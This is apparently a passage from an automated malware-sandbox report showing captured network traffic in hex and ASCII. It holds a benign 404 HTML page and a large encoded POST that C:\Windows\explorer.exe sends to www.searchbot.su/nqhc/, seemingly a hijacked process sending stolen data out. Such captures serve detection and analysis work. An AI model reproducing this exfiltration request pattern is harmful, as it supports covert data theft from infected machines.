20 2b 20 28 65 78 74 72 61 20 26 20 30 78 33 46 46 29 20 2b 20 30 78 31 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> 404</title> <link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&amp;display=swap" rel="stylesheet"> <script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script> <script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = ((value & 0x3FF) << 10) + (extra & 0x3FF) + 0x10000; }
                                                                                                                                                                                    Nov 21, 2022 19:22:59.859307051 CET1416INData Raw: 6f 75 74 70 75 74 2e 70 75 73 68 28 76 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 6f 75 74 70 75 74 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 65 6e
                                                                                                                                                                                    Data Ascii: output.push(value); } return output; }, encode:function(input){ var output = [], i=0, len=input.length,value; while (i < len) { value = input[i++];
                                                                                                                                                                                    Nov 21, 2022 19:22:59.859385014 CET1417INData Raw: 74 61 20 2f 20 64 61 6d 70 29 20 3a 20 28 64 65 6c 74 61 20 3e 3e 20 31 29 3b 0a 20 20 20 20 20 20 20 20 64 65 6c 74 61 20 2b 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 64 65 6c 74 61 20 2f 20 6e 75 6d 70 6f 69 6e 74 73 29 3b 0a 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: ta / damp) : (delta >> 1); delta += Math.floor(delta / numpoints); for (k = 0; delta > (((base - tmin) * tmax) >> 1); k += base) { delta = Math.floor(delta / ( base - tmin )); } return Math.floo
                                                                                                                                                                                    Nov 21, 2022 19:22:59.859453917 CET1418INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 20 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: throw RangeError ("punycode_bad_input(1)"); } digit = decode_digit(input.charCodeAt(ic++)); if (digit >= base) { throw RangeError("puny
                                                                                                                                                                                    Nov 21, 2022 19:22:59.859509945 CET1420INData Raw: 30 2c 20 6c 65 6e 20 3d 20 6f 75 74 70 75 74 2e 6c 65 6e 67 74 68 3b 20 69 20 3c 20 6c 65 6e 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 61 73 65 5f 66 6c 61 67 73 5b 69 5d 29 20 7b 0a 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: 0, len = output.length; i < len; i++) { if (case_flags[i]) { output[i] = (String.fromCharCode(output[i]).toUpperCase()).charCodeAt(0); } } } return this.utf16.enco
                                                                                                                                                                                    Nov 21, 2022 19:22:59.859563112 CET1421INData Raw: 30 3b 20 6a 20 3c 20 69 6e 70 75 74 5f 6c 65 6e 67 74 68 3b 20 2b 2b 6a 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6a 76 20 3d 20 69 6e 70 75 74 5b 6a 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6a
                                                                                                                                                                                    Data Ascii: 0; j < input_length; ++j) { ijv = input[j]; if (ijv >= n && ijv < m) m = ijv; } if (m - n > Math.floor((maxint - delta) / (h + 1))) { throw RangeError("punycode_overflow
                                                                                                                                                                                    Nov 21, 2022 19:22:59.859633923 CET1422INData Raw: 6f 41 53 43 49 49 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 20 64 6f 6d 61 69 6e 20 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 5f 61 72 72 61 79 20 3d 20 64 6f 6d 61 69 6e 2e 73 70 6c 69 74 28 22 2e 22 29 3b 0a 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: oASCII = function ( domain ) { var domain_array = domain.split("."); var out = []; for (var i=0; i < domain_array.length; ++i) { var s = domain_array[i]; out.push( s.match(/[^A-Za
                                                                                                                                                                                    Nov 21, 2022 19:22:59.859689951 CET1424INData Raw: 65 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6c 6f 67 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 33 30 70 78 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: een; } .logo { padding: 30px 40px; } .content { display: flex; justify-content: space-between; margin: 0 82px; } .left { display: fl
                                                                                                                                                                                    Nov 21, 2022 19:22:59.859743118 CET1425INData Raw: 3a 20 31 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 65 61 64 65 72 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20
                                                                                                                                                                                    Data Ascii: : 15px; } } </style></head><body><header> <div class="logo"> <a href="https://www.nic.ru/"> <svg width="100" height="42" viewBox="0 0 100 42" fill="none" xmlns="http://www.w3.org/2
                                                                                                                                                                                    Nov 21, 2022 19:22:59.859812021 CET1426INData Raw: 32 30 2e 39 34 37 35 5a 22 20 66 69 6c 6c 3d 22 23 31 34 32 39 35 45 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 35 33 2e 31 35 30 39 20 31 34 2e 31 37 38 38 43 35 33 2e
                                                                                                                                                                                    Data Ascii: 20.9475Z" fill="#14295E"></path> <path d="M53.1509 14.1788C53.1695 14.0678 53.1828 13.9659 53.1923 13.8744C53.2017 13.7815 53.2065 13.6867 53.2065 13.5876C53.2065 13.1011 53.0556 12.7287 52.7556 12.47C52.455 12.211 52.0227
                                                                                                                                                                                    Nov 21, 2022 19:22:59.905247927 CET1428INData Raw: 36 34 30 35 20 31 30 2e 30 34 39 34 43 36 35 2e 39 36 37 38 20 31 30 2e 30 34 39 34 20 36 35 2e 33 35 32 31 20 31 30 2e 31 37 35 37 20 36 34 2e 37 39 32 20 31 30 2e 34 32 35 37 43 36 34 2e 32 33 31 37 20 31 30 2e 36 37 37 39 20 36 33 2e 36 31 33
                                                                                                                                                                                    Data Ascii: 6405 10.0494C65.9678 10.0494 65.3521 10.1757 64.792 10.4257C64.2317 10.6779 63.6136 11.0274 62.9346 11.475L63.2065 10.3343L58.7385 10.3351L58.2337 12.5144H59.3852L57.5098 20.6619H60.8287L62.5044 13.3418C62.9323 13.1149 63.3172 12.9453 63.6601


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    5192.168.11.204982845.130.41.2480C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:20:21.453052998 CET500OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.searchbot.su
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 51815
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.searchbot.su
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.searchbot.su/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 39 6a 5a 50 44 69 71 45 4a 47 6e 31 77 35 58 63 4b 78 6a 33 4a 4d 74 72 55 4a 61 52 6c 55 4b 56 30 70 74 4f 30 50 6f 36 35 37 69 38 66 4d 30 44 33 5a 4a 38 41 57 66 6c 37 70 69 75 37 76 75 48 30 4d 41 58 33 48 50 4b 63 61 68 58 48 44 62 33 4a 30 35 2d 52 44 65 75 52 55 43 4c 72 47 31 4d 32 69 75 47 35 59 45 66 73 65 57 4f 57 4e 70 66 77 69 75 37 65 79 48 6a 57 6a 61 6d 6f 79 66 46 6c 49 4c 7a 4f 61 30 4d 78 31 65 51 34 6c 51 59 51 44 6d 5a 67 71 31 67 77 38 7a 4c 53 6e 46 34 59 45 4e 4d 55 77 73 47 7e 76 42 42 56 50 77 5a 46 75 38 77 50 57 32 6b 59 72 50 53 6a 55 31 44 4f 54 61 44 51 6c 4e 65 59 49 76 58 4c 61 62 30 45 37 41 47 75 7a 65 38 59 48 33 36 43 43 6f 5f 56 48 6f 4b 6f 72 6d 30 6c 57 31 4b 59 4a 43 38 6a 50 79 37 51 30 30 4c 65 47 6a 37 6e 69 59 47 39 55 35 36 71 79 36 5a 50 6d 4f 46 48 54 35 48 61 43 59 6f 57 4c 44 44 45 42 4c 6e 44 58 5a 47 78 31 43 65 50 71 32 67 62 6a 48 44 54 4f 49 44 56 44 6a 63 6c 62 7a 45 38 6b 35 63 34 33 42 65 4a 71 61 66 4a 4d 69 71 62 41 4e 77 54 36 57 59 66 6a 41 45 4f 71 78 7a 6f 37 28 6c 6f 34 7a 6c 73 4e 59 31 6c 4b 77 57 77 5a 52 61 34 4f 72 65 74 6e 31 70 70 69 6b 31 48 2d 32 6b 6a 6d 78 69 6e 72 5a 4b 48 72 6c 7a 37 5a 6c 6e 4a 79 68 45 74 74 6c 75 39 36 47 54 44 31 39 6a 68 61 64 49 5a 64 37 70 6b 46 38 5f 7a 46 28 57 4b 65 69 5f 38 35 54 6e 61 34 4a 55 55 68 42 35 39 4b 35 47 50 31 4b 36 4d 31 55 37 7e 59 33 35 53 39 4b 76 6a 75 65 31 6c 46 47 72 45 46 49 45 67 6d 6a 67 63 71 38 79 71 4b 57 63 69 4a 70 76 55 75 44 51 4a 42 7a 61 78 6b 6f 6a 4e 79 46 52 6b 50 41 44 57 76 41 4c 4f 42 45 44 74 6f 44 65 4c 62 43 67 53 6c 71 6c 6b 4e 6f 37 67 44 57 43 70 49 77 36 49 51 6b 7a 68 75 43 61 33 5a 4b 6f 6c 68 4b 41 30 62 36 67 65 70 77 78 39 75 38 31 6a 4e 46 4c 6e 69 41 6c 39 47 57 52 4e 49 6b 4a 76 53 57 37 61 5f 43 52 48 58 79 65 79 55 42 66 38 5a 46 6f 54 67 70 4d 49 79 6f 76 50 4f 63 42 64 32 4f 42 6c 6b 4a 55 77 4a 66 70 59 59 49 6b 52 62 74 4a 53 7a 56 49 41 72 5a 4e 59 58 79 37 49 66 4c 71 32 42 36 66 48 41 59 41 37 70 56 6d 30 36 46 47 7a 79 55 41 75 58 34 4e 7e 35 63 61 30 49 4c 34 49 73 7a 4d 56 38 46 43 61 57 66 56 28 54 51 51 6d 58 6f 41 74 61 49 75 31 4f 44 4a 34 57 30 5f 6c 59 57 51 49 52 6d 69 4a 32 68 34 70 45 38 66 65 47 66 6d 4c 76 36 49 78 64 38 63 4a 71 74 4b 4e 73 6f 38 49 75 6f 66 6b 77 68 4e 4b 6c 7a 4d 32 58 6a 32 48 57 43 58 48 57 36 4d 64 75 6d 75 71 30 4b 64 7a 4f 70 43 73 37 45 4d 68 75 74 6f 61 57 68 57 70 4e 4e 35 62 47 70 71 7e 42 4d 56 52 35 4e 47 69 52 45 48 65 35 71 6f 6e 38 7e 59 55 67 53 50 61 62 37 47 4a 4a 34 61 67 47 64 66 78 75 6a 68 59 59 37 59 4a 78 52 38 46 35 42 72 5a 53 46 79 76 77 68 55 6a 6d 7a 6a 43 71 28 4a 30 65 57 67 4b 6c 71 69 58 46 41 74 69 79 28 75 78 63 31 31 4a 72 33 6e 54 61 75 61 68 58 74 53 62 30 4c 52 51 4b 4c 78 43 39 6f 37 28 59 6e 78 58 6f 74 64 52 38 71 33 62 63 67 62 72 42 6b 77 66 4e 79 59 56 6a 52 73 35 63 4f 55 50 59 75 58 46 58 7e 6d 57 41 6b 4a 6f 55 44 4f 61 68 38 4e 46 54 71 56 6b 45 5a 6f 73 5f 61 74 41 54 63 61 74 67 43 55 7e 30 51 37 55 51 55 4e 4e 35 6a 42 46 56 39 43 51 58 4d 6d 64 44 67 71 4d 37 59 32 43 53 6c 7a 49 73 42 62 36 61 54 79 4f 53 33 69 47 51 4c 71 6e 4b 63 4b 4a 51 73 45 4b 4f 4d 78 71 70 41 71 52 4b 45 77 30 77 77 79 39 65 64 74 4d 56 39 37 6e 51 30 52 53 41 43 7a 38 69 55 47 57 4d 36 67 58 79 32 4c 4c 69 66 69 51 70 61 6a 51 4c 37 5a 34 2d 6c 59 44 4a 37 31 63 79 45 68 5a 66 73 31 78 59 37 53 58 46 64 30 70 43 75 39 48 62 28 63 70 5f 65 42 53 57 47 68 55 63 6b 79 7e 6f 34 44 72 42 37 5a 73 64 50 36 67 38 6d 67 78 45 55 7a 79 57 4a 72 5a 56 79 77 6f 79 43 65 71 6b 6b 54 6b 4c 49 36 74 70 76 73 72 62 49 55 44 6f 4d 52 34 7a 69 6d 4b 58 37 33 54 78 73 5a 31 67 53 76 68 41 39 67 57 39 66 33 61 37 41 66 56 69 30 71 4b 54 70 39 39 56 4c 59 42 61 28 79 38 45 33 79 44 74 6d 39 6c 4f 49 56 71 77 6a 7a 73 79 32 4e 6d 58 55 4f 35 32 7a 58 6d 37 6f 6c 58 78 61 79 37 63 7e 34 42 76 32 6b 74 63 7e 75 6c 6d 54 30 55 33 30 77 72 66 38 31 59 50 37 64 53 4e 46 48 63 38 78 33 69 36 6f 56 33 4e 5a 31 63 63 51 54 52 44 62 53 78 52 61 59 38 33 79 42 71 76 7a 75 72 63 74 6f 6b 33 6c 77 47
                                                                                                                                                                                    Data Ascii: r4txB=9jZPDiqEJGn1w5XcKxj3JMtrUJaRlUKV0ptO0Po657i8fM0D3ZJ8AWfl7piu7vuH0MAX3HPKcahXHDb3J05-RDeuRUCLrG1M2iuG5YEfseWOWNpfwiu7eyHjWjamoyfFlILzOa0Mx1eQ4lQYQDmZgq1gw8zLSnF4YENMUwsG~vBBVPwZFu8wPW2kYrPSjU1DOTaDQlNeYIvXLab0E7AGuze8YH36CCo_VHoKorm0lW1KYJC8jPy7Q00LeGj7niYG9U56qy6ZPmOFHT5HaCYoWLDDEBLnDXZGx1CePq2gbjHDTOIDVDjclbzE8k5c43BeJqafJMiqbANwT6WYfjAEOqxzo7(lo4zlsNY1lKwWwZRa4Oretn1ppik1H-2kjmxinrZKHrlz7ZlnJyhEttlu96GTD19jhadIZd7pkF8_zF(WKei_85Tna4JUUhB59K5GP1K6M1U7~Y35S9Kvjue1lFGrEFIEgmjgcq8yqKWciJpvUuDQJBzaxkojNyFRkPADWvALOBEDtoDeLbCgSlqlkNo7gDWCpIw6IQkzhuCa3ZKolhKA0b6gepwx9u81jNFLniAl9GWRNIkJvSW7a_CRHXyeyUBf8ZFoTgpMIyovPOcBd2OBlkJUwJfpYYIkRbtJSzVIArZNYXy7IfLq2B6fHAYA7pVm06FGzyUAuX4N~5ca0IL4IszMV8FCaWfV(TQQmXoAtaIu1ODJ4W0_lYWQIRmiJ2h4pE8feGfmLv6Ixd8cJqtKNso8IuofkwhNKlzM2Xj2HWCXHW6Mdumuq0KdzOpCs7EMhutoaWhWpNN5bGpq~BMVR5NGiREHe5qon8~YUgSPab7GJJ4agGdfxujhYY7YJxR8F5BrZSFyvwhUjmzjCq(J0eWgKlqiXFAtiy(uxc11Jr3nTauahXtSb0LRQKLxC9o7(YnxXotdR8q3bcgbrBkwfNyYVjRs5cOUPYuXFX~mWAkJoUDOah8NFTqVkEZos_atATcatgCU~0Q7UQUNN5jBFV9CQXMmdDgqM7Y2CSlzIsBb6aTyOS3iGQLqnKcKJQsEKOMxqpAqRKEw0wwy9edtMV97nQ0RSACz8iUGWM6gXy2LLifiQpajQL7Z4-lYDJ71cyEhZfs1xY7SXFd0pCu9Hb(cp_eBSWGhUcky~o4DrB7ZsdP6g8mgxEUzyWJrZVywoyCeqkkTkLI6tpvsrbIUDoMR4zimKX73TxsZ1gSvhA9gW9f3a7AfVi0qKTp99VLYBa(y8E3yDtm9lOIVqwjzsy2NmXUO52zXm7olXxay7c~4Bv2ktc~ulmT0U30wrf81YP7dSNFHc8x3i6oV3NZ1ccQTRDbSxRaY83yBqvzurctok3lwG95fKmTPm6DlTA9LnSZrgriTgP2KdFcrFQXuceHTeHS-RAgAHBrrGY9b0oHbRmQeX_Eh(WAxo5wPV9QZibJLnSQsFjojJFt_bONv4HkFB4kV9KPyW0ITa7bSxtEC2x0lI3EXOC2-rQTWP9(j6XD4~wBwrvU8GuoqeuSi2dPQYb2vTSSPPrV082ZbpwvITyNygd9J9HBzOYAGi3MIGYnb2AsifutJmAOjgMq7yqnL0SBjZqVf36LsR03xY5es2TfAwthAj0AVggu-(AmAi9yUaOJNeQCOMIIEVbBTZNxekXKJ2mnNkZsdWKxxtIKT5OC2vdWMnfL_nuXVrOkznN8xtJxB7LLmg7HHlt4znkFAne5bKVMD9pR9KlkwQ-kZSQ8BUn(wIZ2vQQb89rJzb6yiv7AjAFXUrbtIBCbqpI4dsAXfhLEfgRgTMCu2YbOzHEjfA0wPgbs0Zv6bJBteoKw3G5Q3~yoXoG23yKZT~S4OtP8XgO8RGBgLkNoKcDRl57~kxOzaYoy0xJIPBpx89m99WiPvZ18zIrEdw4CkVtKe9DIvTp~fIdQ0W6954mbgDsvpdcslqtFoTa~L1fPD7Sba7F37U_m9ad6xMTRe0iGpXhHMeQMB4XVb7-(G5iczTpDiv1d3Wd3GZf(UoJO5Z8RKu-YkRs4xhLkqPqpfM3(czjMR~62v~45UYTLXu1Jha_O9Nv1nDWarY80G3CquqyT3(SFjS2in4aCqvdlGHCQ57fRm6UkXSWFRCdqPfHdXs1CTBeQEfd2n50KyxuuA(JfXMKAy80KAzjxxUunJitoMhv3KVx2kKCNSfqnX2wVGVErDRmW9S-aylu1Vj0hK3RsBYF8lka74hynj5v4FH2u_lAreR6yObugIjdoA28X5zA5ORUPW1wtm1EmNTn(ReZxuj9K2lG~xUyeEh5SaXDK-kGvGFNGuCuTDJTrz~XbePmtpRDpO(YzugoKRIjXjHQp0Z2i3EjMOzQ65Yf0Lm6CUq1m8olCqXSYec2u07O~1BECVJfmik2L57BmfgFY5QYJqWx1GNPr4f72MeKXZ0_iPjIXq117cuZKZsdKox66GjaX9aGYB11P4OWcyTgWY0aYgY4N-mR0MfHGin9pR9ZA3B-N_cybDIY8cIYUXaeJ-249iZxVDcmDfIFL4dJ3Mu4xkWtFTvOryZhAmKyAK~ktk1KRK8mOnti2YMBCwDvkw1tCSGQrNRA7VQtWL4GLmXuL8WNkiXrWfKfHRpkZpf5O8TmPt6QySzGt_j893HxJn2pwdfgpyyvULWwowYbumw27oMhNf2XNCbQOlhfMRqKPkg0MudKaTG_YVpw(1282LkjeCuOmWPK8mrN5vkqP7fv8IQwZ1MXDrdAn81LmRy8UOHyX0Gcn0CAezTA~b6HXqjBCwAPPhIsZOf6Ys8y4enx1H3lsLFq2mkKqf1rckZ-EnFkGh0w9XrBhDtEQ9cy3CjxuzilrSnhycfGJ2TgykUA2Op4vPPSiwS1bL5zCspZRenDHwrzvoel6VXBKsuVHXdN6l53513SEYoOn4NayUO3rqbQFyu8aNvGbq(_uj3pdcX311EwUpJF1toNdJ8oGDiQU2Q-Mo~QG-yZAt7neHevUyUcGmd_d8IucR~7GtjlG8bZDJbwer1ZY47-lHsTg_zwefBhy39nBifNXKM3jaV3XYfMnIT8TlKZI1w4Z53LtrBf8lP9tEsBPOGsDV6h(2BF5jmigkqD45UKElN0VlzXz7eVFRt_9wT1wSD3jqgLAPr2IlI8YiyNC6XIyNXEwnHCplFYrv9rMWOSTnmRXPZbfR1cE0Oq5lYxteMowlPn3XF7c7Y7849OjkZCCw9DZHqGmTD1h8SdCJX4OjM0Ee3CXEP1f54OEKtfKswr8mwcAWRHXI(oTFKnp8ru~MVrteQvg8~mLCTE49dD7jxcTkdMSEnbNgw7S4ZJ5LJJNkH-7JgKiz6Sc4x7UZkFUuQk7a8sl6fjcliR~W13SXGt07B59PnGdr6SIrJZ5qGfavCAAjdfts8aCjpJMy1CA777Kq4gZYAzwcy-39FII1Jf9ZEF6-HwBXcGQHwIldO3HtV4GuIkInn1Vac7(k3N
                                                                                                                                                                                    Nov 21, 2022 19:20:21.453119993 CET509OUTData Raw: 33 43 71 42 4e 76 44 78 53 33 48 54 41 4f 48 35 4d 39 33 6c 6b 7a 6f 71 53 6b 70 4c 51 66 45 73 64 57 6b 58 75 66 6f 37 30 71 43 69 45 62 62 50 35 52 4c 70 45 6a 6d 51 54 77 67 76 56 69 6d 63 46 6f 6f 79 73 58 56 7a 6a 4a 36 77 6f 4a 67 39 54 4e
                                                                                                                                                                                    Data Ascii: 3CqBNvDxS3HTAOH5M93lkzoqSkpLQfEsdWkXufo70qCiEbbP5RLpEjmQTwgvVimcFooysXVzjJ6woJg9TNbS3uWCj31FfTQnLORE(lrYcEDHOjyh6pd53UM5Ko9LvcRLAJIzOi3bHrLMVggpRrdzDz07UwvTUGkf1s3U82cJzOk9ntgdxo6rtakQKhiL9clNF3F1qT1no23Ehhorx7HK4tpzlnRm4QPZmnmFHfANjqEqlMTCBVh
                                                                                                                                                                                    Nov 21, 2022 19:20:21.510911942 CET512OUTData Raw: 7e 53 6a 56 67 33 68 36 42 46 65 50 55 5f 32 70 43 44 4a 61 43 70 62 56 33 4c 42 70 4f 69 6b 4e 74 79 67 6e 35 37 51 69 37 67 74 31 55 61 67 43 52 49 71 6a 48 4b 4f 6b 4e 73 34 2d 4e 6c 49 51 51 36 6b 4e 6b 38 47 7a 64 5a 33 51 64 43 55 73 34 57
                                                                                                                                                                                    Data Ascii: ~SjVg3h6BFePU_2pCDJaCpbV3LBpOikNtygn57Qi7gt1UagCRIqjHKOkNs4-NlIQQ6kNk8GzdZ3QdCUs4W1XpsS8uwwKz2jBw3U_5zT4mpeiPwkwcBzFqjHXqWX6V9nG~U9KBScccrPCtVohMRY1IlF8w2SO41ymWYDUPZZb9dOXNIcfR7ORIJbULTVqsa30j1HG~gbjMVB862Whzm73by~9zvfJtUcKhioQrkft(O4LTlH3oly
                                                                                                                                                                                    Nov 21, 2022 19:20:21.511076927 CET517OUTData Raw: 50 2d 50 62 7e 6d 69 31 42 52 57 4d 34 52 43 63 54 4e 45 56 7a 67 65 4c 6e 79 7e 48 6c 35 30 73 6b 52 76 50 4e 54 6a 55 54 74 47 4f 52 58 42 45 57 55 55 43 6d 4d 78 30 62 58 54 73 72 58 4b 68 51 33 39 2d 52 47 69 74 35 5f 58 57 53 70 78 76 67 44
                                                                                                                                                                                    Data Ascii: P-Pb~mi1BRWM4RCcTNEVzgeLny~Hl50skRvPNTjUTtGORXBEWUUCmMx0bXTsrXKhQ39-RGit5_XWSpxvgD0Yb_jIkA2r26IGxWyZ~yw8HWJZ0V(K7DwyDrT_Z9hqguHOeJXNcFOsHHhbPsk157Z_VRilRViy6uSZUZ0aNQTUaWxc2DoJauvsU9NrUqo3qAOzB4e71LcqWZXiIqagcgUSe8JPH5~Qs5J4vGyZzDjf5a3dFyxyXgX
                                                                                                                                                                                    Nov 21, 2022 19:20:21.511414051 CET521OUTData Raw: 50 63 54 43 57 6b 51 75 39 6c 75 33 51 66 36 30 50 76 53 54 54 32 59 67 4b 51 59 52 4d 78 68 71 51 4f 4c 33 50 77 49 38 43 36 59 49 54 4a 6c 75 55 52 7a 66 77 6c 43 64 75 6f 46 76 65 42 4c 4c 56 4f 69 77 28 52 63 64 57 37 55 69 7e 53 78 6b 55 64
                                                                                                                                                                                    Data Ascii: PcTCWkQu9lu3Qf60PvSTT2YgKQYRMxhqQOL3PwI8C6YITJluURzfwlCduoFveBLLVOiw(RcdW7Ui~SxkUdEvfHKCMOjKbgocShE7cmb9PaRxVxp-CEkyAMqWjxnzzzGmIYYejT2OfWRw1NJXzZjCio00DHviXzYdkFBvtDiVj8Lxp1ZaqcbtnidNt9hI59tlDTZ0Ff3jjC8PJDo-7-kSqrEiv0aX2abnLziHWNpMop6C8dYLawZ
                                                                                                                                                                                    Nov 21, 2022 19:20:21.511584044 CET522OUTData Raw: 32 68 49 52 36 46 65 73 56 4a 53 6c 76 79 6b 61 52 46 6c 6b 78 63 33 72 53 41 45 53 66 38 43 50 5a 50 45 6f 34 46 47 4d 52 6e 4f 53 34 49 35 58 78 46 52 61 39 41 39 49 54 69 62 35 6c 55 67 78 68 2d 67 4e 51 4a 6d 48 6c 2d 43 68 39 58 38 52 55 48
                                                                                                                                                                                    Data Ascii: 2hIR6FesVJSlvykaRFlkxc3rSAESf8CPZPEo4FGMRnOS4I5XxFRa9A9ITib5lUgxh-gNQJmHl-Ch9X8RUH76uHKmNDz0H_(Go8TwzYCkEvXc(fTYiiIH0skb9jBG3jG4xHuf7gzBh3SUkw5WJlk-4tpxk1oQxw3L09x1T7UnRbjfvoVnyD3gNpo1b_HlLU4OEDmNfEx3mfNs2qnKIRTs(8NQJXANjYiRL5ISN-Rx8djIqJS0ql(
                                                                                                                                                                                    Nov 21, 2022 19:20:21.511754990 CET525OUTData Raw: 69 39 28 63 35 67 31 4a 4a 6e 51 44 6c 4c 74 34 5a 73 58 47 57 61 51 63 75 72 46 49 49 41 44 68 4d 43 66 32 6e 32 64 30 71 38 4a 58 42 33 4f 32 65 66 6d 38 64 38 64 33 57 6e 4e 39 64 52 6c 4c 71 6d 46 54 76 4e 73 4e 32 72 5a 57 77 76 52 34 72 42
                                                                                                                                                                                    Data Ascii: i9(c5g1JJnQDlLt4ZsXGWaQcurFIIADhMCf2n2d0q8JXB3O2efm8d8d3WnN9dRlLqmFTvNsN2rZWwvR4rBimaTRCw9(BvbVUL4A-mawf35Bp7H3cCFonRYxHatmViT~s2glAuXBMJkHdxdYL~vPV1N2BRtrX8Rh2Sk(y4H0I3D0gy1neJTsv1WVOMnRQIVAS9TyAWYmawKoBh7Za2ddJkcrhxJmzCeMvOl3TlecgKovEK-R1b_Z
                                                                                                                                                                                    Nov 21, 2022 19:20:21.511921883 CET526OUTData Raw: 4d 49 78 4e 62 30 6b 70 51 70 30 46 46 34 42 4d 77 51 44 64 4b 79 77 4e 4c 46 59 42 4f 6c 58 55 70 46 55 6e 33 6c 62 78 34 39 68 63 35 33 5a 57 51 47 76 66 68 67 6d 64 28 75 77 31 73 49 5a 42 32 32 7a 4c 78 70 46 51 48 48 59 77 61 61 78 68 4b 6b
                                                                                                                                                                                    Data Ascii: MIxNb0kpQp0FF4BMwQDdKywNLFYBOlXUpFUn3lbx49hc53ZWQGvfhgmd(uw1sIZB22zLxpFQHHYwaaxhKktSd3eOuQNUwkXnHOtxkdxyl9w4ktQS5iuFfbHVks0MUn(0Y0GIDn0ySl85GvwvrREe2BU7PmAwpK4336lTnl9nt2kjzENhrKTrPbRFvj(GA9hBY2zu5709MHra(FlBD1gHjoR4ohuqiIZUQvVCEwMJG1~s7JCPOqC
                                                                                                                                                                                    Nov 21, 2022 19:20:21.512089968 CET530OUTData Raw: 6d 35 6d 57 77 79 50 62 6c 35 68 38 77 74 46 51 63 30 33 66 33 59 6e 5a 6d 45 71 44 39 48 6d 4d 6a 32 32 6b 76 68 7a 70 74 37 57 33 72 43 72 74 6d 63 4f 5a 45 41 47 47 72 50 70 38 7e 35 58 75 66 66 52 5a 57 46 66 70 30 41 7a 5f 7a 71 49 45 79 37
                                                                                                                                                                                    Data Ascii: m5mWwyPbl5h8wtFQc03f3YnZmEqD9HmMj22kvhzpt7W3rCrtmcOZEAGGrPp8~5XuffRZWFfp0Az_zqIEy7XfTx(9zJM3woyMGelA88EQWj9VVOnnBfzGMsKqNCsWnsTgB9KRzN(V2_M5Y57UJcKxvQSjK660qTJhoDNKhLUW2RkyOi8-tR1lojh5SaqDkCqzzWHkqx0qTZoWJeq_XuegMZAv4HrS4KkqoTmhWbTeOdZxBCWcZBB
                                                                                                                                                                                    Nov 21, 2022 19:20:21.512428999 CET533OUTData Raw: 36 78 28 66 6f 46 6d 75 76 2d 34 67 41 45 39 6e 73 42 45 64 77 68 30 54 4f 6c 55 57 4a 45 62 39 52 67 56 79 4d 79 56 6f 4b 32 4e 37 57 31 30 4c 73 5a 74 51 32 39 33 66 51 7a 44 48 37 50 4b 38 43 42 78 48 34 62 7a 52 38 58 44 52 7e 5f 7e 63 31 32
